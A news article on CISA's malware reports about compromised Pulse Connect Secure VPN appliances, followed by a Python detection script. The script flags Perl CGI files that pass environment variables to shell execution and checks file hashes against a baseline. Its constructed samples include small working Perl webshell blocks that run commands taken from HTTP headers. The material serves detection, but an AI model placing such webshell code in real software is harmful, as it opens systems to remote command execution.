27 August 2021

CISA releases MARs on malware targeting Pulse Secure devices


The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published five malware analysis reports (MARs) related to malicious files discovered on compromised Pulse Secure devices.

The MARs include details on the tactics, techniques, and procedures (TTPs) employed by threat actors, as well as Indicators of Compromise (IoCs) related to the attacks.

Threat actors have been targeting Pulse Connect Secure VPN appliances by exploiting several vulnerabilities in the product, including two flaws that came to light earlier this year, CVE-2021-22893 and CVE-2021-22937. The first is an authentication bypass that allows an unauthenticated remote attacker to compromise the affected device; the second is an arbitrary file write triggered by a crafted archive uploaded through the administrator web interface, which lets an attacker who already holds administrator credentials compromise the underlying system.

The samples recovered from compromised Pulse Secure devices and analyzed by CISA include modified CGI scripts that gave an attacker remote access to a target system; a malicious shell script that logged valid users' usernames and passwords to a file on disk; shell scripts that modify a legitimate Pulse Secure Perl Common Gateway Interface (CGI) script in place, turning it into a webshell; a file designed to intercept certificate-based multi-factor authentication; and two Perl scripts that execute attacker commands supplied in an environment variable.
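Two of the behaviours above (a legitimate CGI script modified in place, and commands pulled from an environment variable and handed to the shell) can be triaged offline from a copy of the appliance's CGI directory. The following is an added example for this article, not code from CISA, the MARs, or Pulse Secure: a Python heuristic that flags Perl CGI files where an environment-variable value reaches `system`, `exec`, `eval`, `qx` or backticks, and that compares each file's SHA-256 against a known-good baseline. The Perl samples, the file names and the baseline manifest are constructed here for illustration, and the taint patterns are an assumption about what such an in-place webshell looks like rather than signatures taken from the reports.

```python
"""Heuristic triage of Perl CGI scripts pulled from a VPN appliance.

Added example: the patterns below are assumptions about webshell-style code
(env-var -> shell execution), not signatures from the CISA reports.
"""
import hashlib
import re

# A scalar assigned directly from the CGI environment becomes "tainted".
ASSIGN_FROM_ENV = re.compile(r"(\$\w+)\s*=\s*\$ENV\{[^}]+\}")
# Shell-execution primitives in Perl: system/exec/eval/qx and backtick strings.
EXEC_PRIMITIVE = re.compile(r"\b(?:system|exec|qx|eval)\b|`")
# open(FH, "cmd |") also spawns a shell.
PIPE_OPEN = re.compile(r"\bopen\s*\(.*\|")


def scan_perl_source(src: str) -> list[tuple[int, str]]:
    """Return (line_number, stripped_line) for every line where data read from
    $ENV{...} (directly or via a tainted scalar) reaches a shell primitive."""
    tainted: set[str] = set()
    findings: list[tuple[int, str]] = []
    for lineno, line in enumerate(src.splitlines(), 1):
        m = ASSIGN_FROM_ENV.search(line)
        if m:
            tainted.add(m.group(1))
        uses_env = "$ENV{" in line or any(
            re.search(re.escape(v) + r"\b", line) for v in tainted
        )
        if uses_env and (EXEC_PRIMITIVE.search(line) or PIPE_OPEN.search(line)):
            findings.append((lineno, line.strip()))
    return findings


def verify_manifest(files: dict[str, bytes], manifest: dict[str, str]) -> dict[str, str]:
    """Compare on-disk CGI files to a baseline of SHA-256 digests.

    Returns {name: reason} for files that were modified in place ("hash
    mismatch") or that the baseline does not know about ("not in baseline")."""
    bad: dict[str, str] = {}
    for name, data in files.items():
        digest = hashlib.sha256(data).hexdigest()
        expected = manifest.get(name)
        if expected is None:
            bad[name] = "not in baseline"
        elif expected != digest:
            bad[name] = "hash mismatch"
    return bad


# --- Constructed sample data (not real Pulse Secure files) -----------------
BENIGN_CGI = r"""#!/usr/bin/perl
use strict;
use CGI;
my $q = CGI->new;
print $q->header();
print "Welcome ", $q->param('user'), "\n";
"""

# The same script with a webshell-style block appended, mimicking an
# in-place modification: commands arrive in request headers, which the CGI
# environment exposes as $ENV{HTTP_*}.
MODIFIED_CGI = BENIGN_CGI + r"""# --- appended block, constructed for this example ---
my $cmd = $ENV{HTTP_X_CMD};
if (defined $cmd) {
    print `$cmd`;
}
system($ENV{HTTP_X_RUN}) if defined $ENV{HTTP_X_RUN};
"""

# Baseline built from the known-good version of the script.
BASELINE_MANIFEST = {
    "welcome.cgi": hashlib.sha256(BENIGN_CGI.encode()).hexdigest(),
}

# What was actually found on the appliance: the modified script plus a
# file the baseline has never seen.
ON_DISK = {
    "welcome.cgi": MODIFIED_CGI.encode(),
    "dropped.cgi": b"#!/usr/bin/perl\nsystem($ENV{HTTP_X_RUN});\n",
}


def audit(files: dict[str, bytes], manifest: dict[str, str]) -> dict[str, dict]:
    """Run both checks and collect results per file."""
    report: dict[str, dict] = {}
    integrity = verify_manifest(files, manifest)
    for name, data in files.items():
        report[name] = {
            "integrity": integrity.get(name, "ok"),
            "env_to_shell": scan_perl_source(data.decode(errors="replace")),
        }
    return report


if __name__ == "__main__":
    for name, result in audit(ON_DISK, BASELINE_MANIFEST).items():
        print(name, result["integrity"])
        for lineno, text in result["env_to_shell"]:
            print(f"  line {lineno}: {text}")
```

Run against a real appliance image, the baseline manifest should come from a clean installation of the same Pulse Connect Secure version, and any "hash mismatch" on a vendor CGI should be treated as a potential in-place modification regardless of whether the taint heuristic fires, since an attacker can hide the shell call behind obfuscation the regexes do not recognise.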

“CISA encourages users and administrators to review the following five malware analysis reports (MARs) for threat actor tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs), and review CISA’s Alert, Exploitation of Pulse Connect Secure Vulnerabilities, for more information,” the agency said.

